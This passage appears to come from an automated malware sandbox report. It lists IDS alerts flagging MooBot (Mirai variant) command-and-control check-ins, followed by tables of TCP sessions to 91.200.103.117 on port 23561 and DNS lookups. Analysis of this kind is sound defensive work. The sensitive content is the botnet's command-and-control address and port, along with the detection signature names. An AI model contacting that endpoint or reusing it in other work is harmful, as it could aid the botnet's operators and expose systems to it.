2024-10-07T16:25:33.713552+0200	2030490	ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)	1	192.168.2.13	60052	91.200.103.117	23561	TCP
2024-10-07T16:25:43.368163+0200	2030490	ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)	1	192.168.2.13	60054	91.200.103.117	23561	TCP
2024-10-07T16:25:51.012679+0200	2030490	ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)	1	192.168.2.13	60056	91.200.103.117	23561	TCP
2024-10-07T16:26:02.655537+0200	2030490	ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)	1	192.168.2.13	60058	91.200.103.117	23561	TCP
2024-10-07T16:26:12.352464+0200	2030490	ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)	1	192.168.2.13	60060	91.200.103.117	23561	TCP
2024-10-07T16:26:19.445450+0200	2030490	ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)	1	192.168.2.13	60062	91.200.103.117	23561	TCP
2024-10-07T16:26:29.074585+0200	2030490	ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)	1	192.168.2.13	60064	91.200.103.117	23561	TCP
2024-10-07T16:26:39.705358+0200	2030490	ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)	1	192.168.2.13	60066	91.200.103.117	23561	TCP
2024-10-07T16:26:46.292582+0200	2030490	ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)	1	192.168.2.13	60068	91.200.103.117	23561	TCP
2024-10-07T16:26:48.948300+0200	2030490	ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)	1	192.168.2.13	60070	91.200.103.117	23561	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 7, 2024 16:23:18.971050024 CEST	60012	23561	192.168.2.13	91.200.103.117
Oct 7, 2024 16:23:18.976790905 CEST	23561	60012	91.200.103.117	192.168.2.13
Oct 7, 2024 16:23:18.976841927 CEST	60012	23561	192.168.2.13	91.200.103.117
Oct 7, 2024 16:23:18.977987051 CEST	60012	23561	192.168.2.13	91.200.103.117
Oct 7, 2024 16:23:18.983072996 CEST	23561	60012	91.200.103.117	192.168.2.13
Oct 7, 2024 16:23:20.584208965 CEST	23561	60012	91.200.103.117	192.168.2.13
Oct 7, 2024 16:23:20.584274054 CEST	60012	23561	192.168.2.13	91.200.103.117
Oct 7, 2024 16:23:20.589231968 CEST	23561	60012	91.200.103.117	192.168.2.13
Oct 7, 2024 16:23:23.713038921 CEST	60014	23561	192.168.2.13	91.200.103.117
Oct 7, 2024 16:23:23.717952967 CEST	23561	60014	91.200.103.117	192.168.2.13
Oct 7, 2024 16:23:23.718280077 CEST	60014	23561	192.168.2.13	91.200.103.117
Oct 7, 2024 16:23:23.800327063 CEST	60014	23561	192.168.2.13	91.200.103.117
Oct 7, 2024 16:23:23.805636883 CEST	23561	60014	91.200.103.117	192.168.2.13
Oct 7, 2024 16:23:25.334641933 CEST	23561	60014	91.200.103.117	192.168.2.13
Oct 7, 2024 16:23:25.334829092 CEST	60014	23561	192.168.2.13	91.200.103.117
Oct 7, 2024 16:23:25.339783907 CEST	23561	60014	91.200.103.117	192.168.2.13
Oct 7, 2024 16:23:28.345509052 CEST	60016	23561	192.168.2.13	91.200.103.117
Oct 7, 2024 16:23:28.350739956 CEST	23561	60016	91.200.103.117	192.168.2.13
Oct 7, 2024 16:23:28.350811958 CEST	60016	23561	192.168.2.13	91.200.103.117
Oct 7, 2024 16:23:28.351917028 CEST	60016	23561	192.168.2.13	91.200.103.117
Oct 7, 2024 16:23:28.357064009 CEST	23561	60016	91.200.103.117	192.168.2.13
Oct 7, 2024 16:23:29.974560022 CEST	23561	60016	91.200.103.117	192.168.2.13
Oct 7, 2024 16:23:29.974834919 CEST	60016	23561	192.168.2.13	91.200.103.117
Oct 7, 2024 16:23:29.979707956 CEST	23561	60016	91.200.103.117	192.168.2.13
Oct 7, 2024 16:23:35.984297037 CEST	60018	23561	192.168.2.13	91.200.103.117
Oct 7, 2024 16:23:35.989315033 CEST	23561	60018	91.200.103.117	192.168.2.13
Oct 7, 2024 16:23:35.989366055 CEST	60018	23561	192.168.2.13	91.200.103.117
Oct 7, 2024 16:23:35.989973068 CEST	60018	23561	192.168.2.13	91.200.103.117
Oct 7, 2024 16:23:35.994754076 CEST	23561	60018	91.200.103.117	192.168.2.13
Oct 7, 2024 16:23:37.653223038 CEST	23561	60018	91.200.103.117	192.168.2.13
Oct 7, 2024 16:23:37.653527021 CEST	60018	23561	192.168.2.13	91.200.103.117
Oct 7, 2024 16:23:37.658499956 CEST	23561	60018	91.200.103.117	192.168.2.13
Oct 7, 2024 16:23:47.814318895 CEST	60020	23561	192.168.2.13	91.200.103.117
Oct 7, 2024 16:23:47.819235086 CEST	23561	60020	91.200.103.117	192.168.2.13
Oct 7, 2024 16:23:47.819319010 CEST	60020	23561	192.168.2.13	91.200.103.117
Oct 7, 2024 16:23:47.820417881 CEST	60020	23561	192.168.2.13	91.200.103.117
Oct 7, 2024 16:23:47.825752020 CEST	23561	60020	91.200.103.117	192.168.2.13
Oct 7, 2024 16:23:49.430105925 CEST	23561	60020	91.200.103.117	192.168.2.13
Oct 7, 2024 16:23:49.430381060 CEST	60020	23561	192.168.2.13	91.200.103.117
Oct 7, 2024 16:23:49.435735941 CEST	23561	60020	91.200.103.117	192.168.2.13
Oct 7, 2024 16:23:56.440587997 CEST	60022	23561	192.168.2.13	91.200.103.117
Oct 7, 2024 16:23:56.445512056 CEST	23561	60022	91.200.103.117	192.168.2.13
Oct 7, 2024 16:23:56.445579052 CEST	60022	23561	192.168.2.13	91.200.103.117
Oct 7, 2024 16:23:56.446305037 CEST	60022	23561	192.168.2.13	91.200.103.117
Oct 7, 2024 16:23:56.451242924 CEST	23561	60022	91.200.103.117	192.168.2.13
Oct 7, 2024 16:23:58.097121954 CEST	23561	60022	91.200.103.117	192.168.2.13
Oct 7, 2024 16:23:58.097431898 CEST	60022	23561	192.168.2.13	91.200.103.117
Oct 7, 2024 16:23:58.102606058 CEST	23561	60022	91.200.103.117	192.168.2.13
Oct 7, 2024 16:24:08.107471943 CEST	60024	23561	192.168.2.13	91.200.103.117
Oct 7, 2024 16:24:08.112365961 CEST	23561	60024	91.200.103.117	192.168.2.13
Oct 7, 2024 16:24:08.112412930 CEST	60024	23561	192.168.2.13	91.200.103.117
Oct 7, 2024 16:24:08.113075018 CEST	60024	23561	192.168.2.13	91.200.103.117
Oct 7, 2024 16:24:08.117831945 CEST	23561	60024	91.200.103.117	192.168.2.13
Oct 7, 2024 16:24:09.708200932 CEST	23561	60024	91.200.103.117	192.168.2.13
Oct 7, 2024 16:24:09.708465099 CEST	60024	23561	192.168.2.13	91.200.103.117
Oct 7, 2024 16:24:09.713282108 CEST	23561	60024	91.200.103.117	192.168.2.13
Oct 7, 2024 16:24:10.721968889 CEST	60026	23561	192.168.2.13	91.200.103.117
Oct 7, 2024 16:24:10.726747990 CEST	23561	60026	91.200.103.117	192.168.2.13
Oct 7, 2024 16:24:10.726805925 CEST	60026	23561	192.168.2.13	91.200.103.117
Oct 7, 2024 16:24:10.727857113 CEST	60026	23561	192.168.2.13	91.200.103.117
Oct 7, 2024 16:24:10.732708931 CEST	23561	60026	91.200.103.117	192.168.2.13
Oct 7, 2024 16:24:12.426966906 CEST	23561	60026	91.200.103.117	192.168.2.13
Oct 7, 2024 16:24:12.427237988 CEST	60026	23561	192.168.2.13	91.200.103.117
Oct 7, 2024 16:24:12.432125092 CEST	23561	60026	91.200.103.117	192.168.2.13
Oct 7, 2024 16:24:15.437334061 CEST	60028	23561	192.168.2.13	91.200.103.117
Oct 7, 2024 16:24:15.442307949 CEST	23561	60028	91.200.103.117	192.168.2.13
Oct 7, 2024 16:24:15.442361116 CEST	60028	23561	192.168.2.13	91.200.103.117
Oct 7, 2024 16:24:15.442945957 CEST	60028	23561	192.168.2.13	91.200.103.117
Oct 7, 2024 16:24:15.447715044 CEST	23561	60028	91.200.103.117	192.168.2.13
Oct 7, 2024 16:24:17.141319990 CEST	23561	60028	91.200.103.117	192.168.2.13
Oct 7, 2024 16:24:17.141603947 CEST	60028	23561	192.168.2.13	91.200.103.117
Oct 7, 2024 16:24:17.146414042 CEST	23561	60028	91.200.103.117	192.168.2.13
Oct 7, 2024 16:24:18.151138067 CEST	60030	23561	192.168.2.13	91.200.103.117
Oct 7, 2024 16:24:18.156042099 CEST	23561	60030	91.200.103.117	192.168.2.13
Oct 7, 2024 16:24:18.156142950 CEST	60030	23561	192.168.2.13	91.200.103.117
Oct 7, 2024 16:24:18.156728983 CEST	60030	23561	192.168.2.13	91.200.103.117
Oct 7, 2024 16:24:18.161494017 CEST	23561	60030	91.200.103.117	192.168.2.13
Oct 7, 2024 16:24:19.758491039 CEST	23561	60030	91.200.103.117	192.168.2.13
Oct 7, 2024 16:24:19.760449886 CEST	60030	23561	192.168.2.13	91.200.103.117
Oct 7, 2024 16:24:19.765355110 CEST	23561	60030	91.200.103.117	192.168.2.13
Oct 7, 2024 16:24:21.776551962 CEST	60032	23561	192.168.2.13	91.200.103.117
Oct 7, 2024 16:24:21.781466961 CEST	23561	60032	91.200.103.117	192.168.2.13
Oct 7, 2024 16:24:21.781631947 CEST	60032	23561	192.168.2.13	91.200.103.117
Oct 7, 2024 16:24:21.784212112 CEST	60032	23561	192.168.2.13	91.200.103.117
Oct 7, 2024 16:24:21.788935900 CEST	23561	60032	91.200.103.117	192.168.2.13
Oct 7, 2024 16:24:23.401499033 CEST	23561	60032	91.200.103.117	192.168.2.13
Oct 7, 2024 16:24:23.401724100 CEST	60032	23561	192.168.2.13	91.200.103.117
Oct 7, 2024 16:24:23.406691074 CEST	23561	60032	91.200.103.117	192.168.2.13
Oct 7, 2024 16:24:32.789669037 CEST	60034	23561	192.168.2.13	91.200.103.117
Oct 7, 2024 16:24:32.794408083 CEST	23561	60034	91.200.103.117	192.168.2.13
Oct 7, 2024 16:24:32.794461966 CEST	60034	23561	192.168.2.13	91.200.103.117
Oct 7, 2024 16:24:32.795047998 CEST	60034	23561	192.168.2.13	91.200.103.117
Oct 7, 2024 16:24:32.799797058 CEST	23561	60034	91.200.103.117	192.168.2.13
Oct 7, 2024 16:24:34.395739079 CEST	23561	60034	91.200.103.117	192.168.2.13
Oct 7, 2024 16:24:34.395901918 CEST	60034	23561	192.168.2.13	91.200.103.117
Oct 7, 2024 16:24:34.400850058 CEST	23561	60034	91.200.103.117	192.168.2.13
Oct 7, 2024 16:24:43.407588005 CEST	60036	23561	192.168.2.13	91.200.103.117
Oct 7, 2024 16:24:43.412518024 CEST	23561	60036	91.200.103.117	192.168.2.13
Oct 7, 2024 16:24:43.412569046 CEST	60036	23561	192.168.2.13	91.200.103.117
Oct 7, 2024 16:24:43.413248062 CEST	60036	23561	192.168.2.13	91.200.103.117
Oct 7, 2024 16:24:43.418231010 CEST	23561	60036	91.200.103.117	192.168.2.13
Oct 7, 2024 16:24:45.043955088 CEST	23561	60036	91.200.103.117	192.168.2.13
Oct 7, 2024 16:24:45.044100046 CEST	60036	23561	192.168.2.13	91.200.103.117
Oct 7, 2024 16:24:45.044100046 CEST	60036	23561	192.168.2.13	91.200.103.117
Oct 7, 2024 16:24:45.048938990 CEST	23561	60036	91.200.103.117	192.168.2.13
Oct 7, 2024 16:24:49.055422068 CEST	60038	23561	192.168.2.13	91.200.103.117
Oct 7, 2024 16:24:49.060698986 CEST	23561	60038	91.200.103.117	192.168.2.13
Oct 7, 2024 16:24:49.060808897 CEST	60038	23561	192.168.2.13	91.200.103.117
Oct 7, 2024 16:24:49.061773062 CEST	60038	23561	192.168.2.13	91.200.103.117
Oct 7, 2024 16:24:49.066864014 CEST	23561	60038	91.200.103.117	192.168.2.13
Oct 7, 2024 16:24:50.768790007 CEST	23561	60038	91.200.103.117	192.168.2.13
Oct 7, 2024 16:24:50.768951893 CEST	60038	23561	192.168.2.13	91.200.103.117
Oct 7, 2024 16:24:50.773803949 CEST	23561	60038	91.200.103.117	192.168.2.13
Oct 7, 2024 16:24:52.782180071 CEST	60040	23561	192.168.2.13	91.200.103.117
Oct 7, 2024 16:24:52.787024975 CEST	23561	60040	91.200.103.117	192.168.2.13
Oct 7, 2024 16:24:52.787111998 CEST	60040	23561	192.168.2.13	91.200.103.117
Oct 7, 2024 16:24:52.790287018 CEST	60040	23561	192.168.2.13	91.200.103.117
Oct 7, 2024 16:24:52.795082092 CEST	23561	60040	91.200.103.117	192.168.2.13
Oct 7, 2024 16:24:54.401439905 CEST	23561	60040	91.200.103.117	192.168.2.13
Oct 7, 2024 16:24:54.401612043 CEST	60040	23561	192.168.2.13	91.200.103.117
Oct 7, 2024 16:24:54.406414032 CEST	23561	60040	91.200.103.117	192.168.2.13
Oct 7, 2024 16:24:59.412154913 CEST	60042	23561	192.168.2.13	91.200.103.117
Oct 7, 2024 16:24:59.416986942 CEST	23561	60042	91.200.103.117	192.168.2.13
Oct 7, 2024 16:24:59.417081118 CEST	60042	23561	192.168.2.13	91.200.103.117
Oct 7, 2024 16:24:59.417907953 CEST	60042	23561	192.168.2.13	91.200.103.117
Oct 7, 2024 16:24:59.422909021 CEST	23561	60042	91.200.103.117	192.168.2.13
Oct 7, 2024 16:25:01.058278084 CEST	23561	60042	91.200.103.117	192.168.2.13
Oct 7, 2024 16:25:01.058619976 CEST	60042	23561	192.168.2.13	91.200.103.117
Oct 7, 2024 16:25:01.063472033 CEST	23561	60042	91.200.103.117	192.168.2.13
Oct 7, 2024 16:25:08.080708981 CEST	60044	23561	192.168.2.13	91.200.103.117
Oct 7, 2024 16:25:08.086767912 CEST	23561	60044	91.200.103.117	192.168.2.13
Oct 7, 2024 16:25:08.086832047 CEST	60044	23561	192.168.2.13	91.200.103.117
Oct 7, 2024 16:25:08.087656975 CEST	60044	23561	192.168.2.13	91.200.103.117
Oct 7, 2024 16:25:08.093493938 CEST	23561	60044	91.200.103.117	192.168.2.13
Oct 7, 2024 16:25:09.750983953 CEST	23561	60044	91.200.103.117	192.168.2.13
Oct 7, 2024 16:25:09.751563072 CEST	60044	23561	192.168.2.13	91.200.103.117
Oct 7, 2024 16:25:09.756335020 CEST	23561	60044	91.200.103.117	192.168.2.13
Oct 7, 2024 16:25:12.762860060 CEST	60046	23561	192.168.2.13	91.200.103.117
Oct 7, 2024 16:25:12.767757893 CEST	23561	60046	91.200.103.117	192.168.2.13
Oct 7, 2024 16:25:12.767818928 CEST	60046	23561	192.168.2.13	91.200.103.117
Oct 7, 2024 16:25:12.768388987 CEST	60046	23561	192.168.2.13	91.200.103.117
Oct 7, 2024 16:25:12.773225069 CEST	23561	60046	91.200.103.117	192.168.2.13
Oct 7, 2024 16:25:14.386382103 CEST	23561	60046	91.200.103.117	192.168.2.13
Oct 7, 2024 16:25:14.386615038 CEST	60046	23561	192.168.2.13	91.200.103.117
Oct 7, 2024 16:25:14.391479015 CEST	23561	60046	91.200.103.117	192.168.2.13
Oct 7, 2024 16:25:22.396341085 CEST	60048	23561	192.168.2.13	91.200.103.117
Oct 7, 2024 16:25:22.401190042 CEST	23561	60048	91.200.103.117	192.168.2.13
Oct 7, 2024 16:25:22.401241064 CEST	60048	23561	192.168.2.13	91.200.103.117
Oct 7, 2024 16:25:22.401937008 CEST	60048	23561	192.168.2.13	91.200.103.117
Oct 7, 2024 16:25:22.407319069 CEST	23561	60048	91.200.103.117	192.168.2.13
Oct 7, 2024 16:25:24.044132948 CEST	23561	60048	91.200.103.117	192.168.2.13
Oct 7, 2024 16:25:24.044312000 CEST	60048	23561	192.168.2.13	91.200.103.117
Oct 7, 2024 16:25:24.049165010 CEST	23561	60048	91.200.103.117	192.168.2.13
Oct 7, 2024 16:25:25.053244114 CEST	60050	23561	192.168.2.13	91.200.103.117
Oct 7, 2024 16:25:25.058274984 CEST	23561	60050	91.200.103.117	192.168.2.13
Oct 7, 2024 16:25:25.058372974 CEST	60050	23561	192.168.2.13	91.200.103.117
Oct 7, 2024 16:25:25.059437990 CEST	60050	23561	192.168.2.13	91.200.103.117
Oct 7, 2024 16:25:25.064352036 CEST	23561	60050	91.200.103.117	192.168.2.13
Oct 7, 2024 16:25:26.697621107 CEST	23561	60050	91.200.103.117	192.168.2.13
Oct 7, 2024 16:25:26.697889090 CEST	60050	23561	192.168.2.13	91.200.103.117
Oct 7, 2024 16:25:26.702714920 CEST	23561	60050	91.200.103.117	192.168.2.13
Oct 7, 2024 16:25:33.707356930 CEST	60052	23561	192.168.2.13	91.200.103.117
Oct 7, 2024 16:25:33.712356091 CEST	23561	60052	91.200.103.117	192.168.2.13
Oct 7, 2024 16:25:33.712430954 CEST	60052	23561	192.168.2.13	91.200.103.117
Oct 7, 2024 16:25:33.713551998 CEST	60052	23561	192.168.2.13	91.200.103.117
Oct 7, 2024 16:25:33.718729973 CEST	23561	60052	91.200.103.117	192.168.2.13
Oct 7, 2024 16:25:35.352093935 CEST	23561	60052	91.200.103.117	192.168.2.13
Oct 7, 2024 16:25:35.352552891 CEST	60052	23561	192.168.2.13	91.200.103.117
Oct 7, 2024 16:25:35.357487917 CEST	23561	60052	91.200.103.117	192.168.2.13
Oct 7, 2024 16:25:43.362433910 CEST	60054	23561	192.168.2.13	91.200.103.117
Oct 7, 2024 16:25:43.367542028 CEST	23561	60054	91.200.103.117	192.168.2.13
Oct 7, 2024 16:25:43.367609024 CEST	60054	23561	192.168.2.13	91.200.103.117
Oct 7, 2024 16:25:43.368163109 CEST	60054	23561	192.168.2.13	91.200.103.117
Oct 7, 2024 16:25:43.373070955 CEST	23561	60054	91.200.103.117	192.168.2.13
Oct 7, 2024 16:25:44.995366096 CEST	23561	60054	91.200.103.117	192.168.2.13
Oct 7, 2024 16:25:44.995624065 CEST	60054	23561	192.168.2.13	91.200.103.117
Oct 7, 2024 16:25:45.000652075 CEST	23561	60054	91.200.103.117	192.168.2.13
Oct 7, 2024 16:25:51.007087946 CEST	60056	23561	192.168.2.13	91.200.103.117
Oct 7, 2024 16:25:51.011991978 CEST	23561	60056	91.200.103.117	192.168.2.13
Oct 7, 2024 16:25:51.012062073 CEST	60056	23561	192.168.2.13	91.200.103.117
Oct 7, 2024 16:25:51.012679100 CEST	60056	23561	192.168.2.13	91.200.103.117
Oct 7, 2024 16:25:51.019509077 CEST	23561	60056	91.200.103.117	192.168.2.13
Oct 7, 2024 16:25:52.638153076 CEST	23561	60056	91.200.103.117	192.168.2.13
Oct 7, 2024 16:25:52.638293028 CEST	60056	23561	192.168.2.13	91.200.103.117
Oct 7, 2024 16:25:52.643152952 CEST	23561	60056	91.200.103.117	192.168.2.13
Oct 7, 2024 16:26:02.648556948 CEST	60058	23561	192.168.2.13	91.200.103.117
Oct 7, 2024 16:26:02.654529095 CEST	23561	60058	91.200.103.117	192.168.2.13
Oct 7, 2024 16:26:02.654598951 CEST	60058	23561	192.168.2.13	91.200.103.117
Oct 7, 2024 16:26:02.655536890 CEST	60058	23561	192.168.2.13	91.200.103.117
Oct 7, 2024 16:26:02.661057949 CEST	23561	60058	91.200.103.117	192.168.2.13
Oct 7, 2024 16:26:04.334763050 CEST	23561	60058	91.200.103.117	192.168.2.13
Oct 7, 2024 16:26:04.334819078 CEST	60058	23561	192.168.2.13	91.200.103.117
Oct 7, 2024 16:26:04.339747906 CEST	23561	60058	91.200.103.117	192.168.2.13
Oct 7, 2024 16:26:12.346317053 CEST	60060	23561	192.168.2.13	91.200.103.117
Oct 7, 2024 16:26:12.351427078 CEST	23561	60060	91.200.103.117	192.168.2.13
Oct 7, 2024 16:26:12.351509094 CEST	60060	23561	192.168.2.13	91.200.103.117
Oct 7, 2024 16:26:12.352463961 CEST	60060	23561	192.168.2.13	91.200.103.117
Oct 7, 2024 16:26:12.360301018 CEST	23561	60060	91.200.103.117	192.168.2.13
Oct 7, 2024 16:26:13.978365898 CEST	23561	60060	91.200.103.117	192.168.2.13
Oct 7, 2024 16:26:13.978595018 CEST	60060	23561	192.168.2.13	91.200.103.117
Oct 7, 2024 16:26:13.983611107 CEST	23561	60060	91.200.103.117	192.168.2.13
Oct 7, 2024 16:26:19.438751936 CEST	60062	23561	192.168.2.13	91.200.103.117
Oct 7, 2024 16:26:19.444695950 CEST	23561	60062	91.200.103.117	192.168.2.13
Oct 7, 2024 16:26:19.444753885 CEST	60062	23561	192.168.2.13	91.200.103.117
Oct 7, 2024 16:26:19.445450068 CEST	60062	23561	192.168.2.13	91.200.103.117
Oct 7, 2024 16:26:19.451320887 CEST	23561	60062	91.200.103.117	192.168.2.13
Oct 7, 2024 16:26:21.056092978 CEST	23561	60062	91.200.103.117	192.168.2.13
Oct 7, 2024 16:26:21.056353092 CEST	60062	23561	192.168.2.13	91.200.103.117
Oct 7, 2024 16:26:21.061939001 CEST	23561	60062	91.200.103.117	192.168.2.13
Oct 7, 2024 16:26:29.067943096 CEST	60064	23561	192.168.2.13	91.200.103.117
Oct 7, 2024 16:26:29.072843075 CEST	23561	60064	91.200.103.117	192.168.2.13
Oct 7, 2024 16:26:29.072930098 CEST	60064	23561	192.168.2.13	91.200.103.117
Oct 7, 2024 16:26:29.074584961 CEST	60064	23561	192.168.2.13	91.200.103.117
Oct 7, 2024 16:26:29.079468966 CEST	23561	60064	91.200.103.117	192.168.2.13
Oct 7, 2024 16:26:30.687489986 CEST	23561	60064	91.200.103.117	192.168.2.13
Oct 7, 2024 16:26:30.687935114 CEST	60064	23561	192.168.2.13	91.200.103.117
Oct 7, 2024 16:26:30.692795038 CEST	23561	60064	91.200.103.117	192.168.2.13
Oct 7, 2024 16:26:39.699177027 CEST	60066	23561	192.168.2.13	91.200.103.117
Oct 7, 2024 16:26:39.704014063 CEST	23561	60066	91.200.103.117	192.168.2.13
Oct 7, 2024 16:26:39.704088926 CEST	60066	23561	192.168.2.13	91.200.103.117
Oct 7, 2024 16:26:39.705358028 CEST	60066	23561	192.168.2.13	91.200.103.117
Oct 7, 2024 16:26:39.710421085 CEST	23561	60066	91.200.103.117	192.168.2.13
Oct 7, 2024 16:26:41.371448994 CEST	23561	60066	91.200.103.117	192.168.2.13
Oct 7, 2024 16:26:41.371629000 CEST	60066	23561	192.168.2.13	91.200.103.117
Oct 7, 2024 16:26:41.377197981 CEST	23561	60066	91.200.103.117	192.168.2.13
Oct 7, 2024 16:26:46.286875010 CEST	60068	23561	192.168.2.13	91.200.103.117
Oct 7, 2024 16:26:46.291831017 CEST	23561	60068	91.200.103.117	192.168.2.13
Oct 7, 2024 16:26:46.291882038 CEST	60068	23561	192.168.2.13	91.200.103.117
Oct 7, 2024 16:26:46.292582035 CEST	60068	23561	192.168.2.13	91.200.103.117
Oct 7, 2024 16:26:46.297641993 CEST	23561	60068	91.200.103.117	192.168.2.13
Oct 7, 2024 16:26:47.931230068 CEST	23561	60068	91.200.103.117	192.168.2.13
Oct 7, 2024 16:26:47.931412935 CEST	60068	23561	192.168.2.13	91.200.103.117
Oct 7, 2024 16:26:47.936336040 CEST	23561	60068	91.200.103.117	192.168.2.13
Oct 7, 2024 16:26:48.942719936 CEST	60070	23561	192.168.2.13	91.200.103.117
Oct 7, 2024 16:26:48.947576046 CEST	23561	60070	91.200.103.117	192.168.2.13
Oct 7, 2024 16:26:48.947649002 CEST	60070	23561	192.168.2.13	91.200.103.117
Oct 7, 2024 16:26:48.948299885 CEST	60070	23561	192.168.2.13	91.200.103.117
Oct 7, 2024 16:26:48.953095913 CEST	23561	60070	91.200.103.117	192.168.2.13
Oct 7, 2024 16:26:50.561278105 CEST	23561	60070	91.200.103.117	192.168.2.13
Oct 7, 2024 16:26:50.561439991 CEST	60070	23561	192.168.2.13	91.200.103.117
Oct 7, 2024 16:26:50.566416025 CEST	23561	60070	91.200.103.117	192.168.2.13

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 7, 2024 16:23:18.959438086 CEST	58706	53	192.168.2.13	8.8.8.8
Oct 7, 2024 16:23:18.970434904 CEST	53	58706	8.8.8.8	192.168.2.13
Oct 7, 2024 16:23:23.664307117 CEST	53549	53	192.168.2.13	8.8.8.8
Oct 7, 2024 16:23:23.685204983 CEST	53	53549	8.8.8.8	192.168.2.13
Oct 7, 2024 16:23:28.337416887 CEST	53581	53	192.168.2.13	8.8.8.8
Oct 7, 2024 16:23:28.344995022 CEST	53	53581	8.8.8.8	192.168.2.13
Oct 7, 2024 16:23:35.976670980 CEST	46305	53	192.168.2.13	8.8.8.8
Oct 7, 2024 16:23:35.983900070 CEST	53	46305	8.8.8.8	192.168.2.13
Oct 7, 2024 16:23:47.655847073 CEST	33069	53	192.168.2.13	8.8.8.8
Oct 7, 2024 16:23:47.813662052 CEST	53	33069	8.8.8.8	192.168.2.13
Oct 7, 2024 16:23:56.432877064 CEST	35398	53	192.168.2.13	8.8.8.8
Oct 7, 2024 16:23:56.440123081 CEST	53	35398	8.8.8.8	192.168.2.13
Oct 7, 2024 16:24:08.099666119 CEST	33115	53	192.168.2.13	8.8.8.8
Oct 7, 2024 16:24:08.107064962 CEST	53	33115	8.8.8.8	192.168.2.13
Oct 7, 2024 16:24:10.710761070 CEST	41269	53	192.168.2.13	8.8.8.8
Oct 7, 2024 16:24:10.721393108 CEST	53	41269	8.8.8.8	192.168.2.13
Oct 7, 2024 16:24:15.429326057 CEST	55294	53	192.168.2.13	8.8.8.8
Oct 7, 2024 16:24:15.436945915 CEST	53	55294	8.8.8.8	192.168.2.13
Oct 7, 2024 16:24:18.143685102 CEST	58302	53	192.168.2.13	8.8.8.8
Oct 7, 2024 16:24:18.150753021 CEST	53	58302	8.8.8.8	192.168.2.13
Oct 7, 2024 16:24:21.766969919 CEST	56952	53	192.168.2.13	8.8.8.8
Oct 7, 2024 16:24:21.773927927 CEST	53	56952	8.8.8.8	192.168.2.13
Oct 7, 2024 16:24:32.404035091 CEST	36490	53	192.168.2.13	8.8.8.8
Oct 7, 2024 16:24:32.788969040 CEST	53	36490	8.8.8.8	192.168.2.13
Oct 7, 2024 16:24:43.397604942 CEST	58951	53	192.168.2.13	8.8.8.8
Oct 7, 2024 16:24:43.407041073 CEST	53	58951	8.8.8.8	192.168.2.13
Oct 7, 2024 16:24:49.046722889 CEST	54934	53	192.168.2.13	8.8.8.8
Oct 7, 2024 16:24:49.054338932 CEST	53	54934	8.8.8.8	192.168.2.13
Oct 7, 2024 16:24:52.771466970 CEST	38040	53	192.168.2.13	8.8.8.8
Oct 7, 2024 16:24:52.781723022 CEST	53	38040	8.8.8.8	192.168.2.13
Oct 7, 2024 16:24:59.404542923 CEST	59266	53	192.168.2.13	8.8.8.8
Oct 7, 2024 16:24:59.411583900 CEST	53	59266	8.8.8.8	192.168.2.13
Oct 7, 2024 16:25:08.060456038 CEST	44972	53	192.168.2.13	8.8.8.8
Oct 7, 2024 16:25:08.080157995 CEST	53	44972	8.8.8.8	192.168.2.13
Oct 7, 2024 16:25:12.755280018 CEST	45229	53	192.168.2.13	8.8.8.8
Oct 7, 2024 16:25:12.762293100 CEST	53	45229	8.8.8.8	192.168.2.13
Oct 7, 2024 16:25:22.388566017 CEST	60862	53	192.168.2.13	8.8.8.8
Oct 7, 2024 16:25:22.395881891 CEST	53	60862	8.8.8.8	192.168.2.13
Oct 7, 2024 16:25:25.045933008 CEST	48884	53	192.168.2.13	8.8.8.8
Oct 7, 2024 16:25:25.052839041 CEST	53	48884	8.8.8.8	192.168.2.13
Oct 7, 2024 16:25:33.699354887 CEST	45652	53	192.168.2.13	8.8.8.8
Oct 7, 2024 16:25:33.706976891 CEST	53	45652	8.8.8.8	192.168.2.13
Oct 7, 2024 16:25:43.354857922 CEST	39538	53	192.168.2.13	8.8.8.8
Oct 7, 2024 16:25:43.362080097 CEST	53	39538	8.8.8.8	192.168.2.13
Oct 7, 2024 16:25:50.998317957 CEST	45401	53	192.168.2.13	8.8.8.8
Oct 7, 2024 16:25:51.006279945 CEST	53	45401	8.8.8.8	192.168.2.13
Oct 7, 2024 16:26:02.640887976 CEST	43609	53	192.168.2.13	8.8.8.8
Oct 7, 2024 16:26:02.648025036 CEST	53	43609	8.8.8.8	192.168.2.13
Oct 7, 2024 16:26:04.193520069 CEST	46709	53	192.168.2.13	1.1.1.1
Oct 7, 2024 16:26:04.193579912 CEST	54306	53	192.168.2.13	1.1.1.1
Oct 7, 2024 16:26:04.201420069 CEST	53	54306	1.1.1.1	192.168.2.13
Oct 7, 2024 16:26:04.201644897 CEST	53	46709	1.1.1.1	192.168.2.13
Oct 7, 2024 16:26:12.337531090 CEST	53258	53	192.168.2.13	8.8.8.8
Oct 7, 2024 16:26:12.345773935 CEST	53	53258	8.8.8.8	192.168.2.13
Oct 7, 2024 16:26:18.981430054 CEST	41330	53	192.168.2.13	8.8.8.8
Oct 7, 2024 16:26:19.438148975 CEST	53	41330	8.8.8.8	192.168.2.13
Oct 7, 2024 16:26:29.059652090 CEST	48510	53	192.168.2.13	8.8.8.8
Oct 7, 2024 16:26:29.067174911 CEST	53	48510	8.8.8.8	192.168.2.13
Oct 7, 2024 16:26:39.691375971 CEST	52488	53	192.168.2.13	8.8.8.8
Oct 7, 2024 16:26:39.698496103 CEST	53	52488	8.8.8.8	192.168.2.13
Oct 7, 2024 16:26:45.374300957 CEST	54943	53	192.168.2.13	8.8.8.8
Oct 7, 2024 16:26:46.285931110 CEST	53	54943	8.8.8.8	192.168.2.13
Oct 7, 2024 16:26:48.934211969 CEST	48980	53	192.168.2.13	8.8.8.8
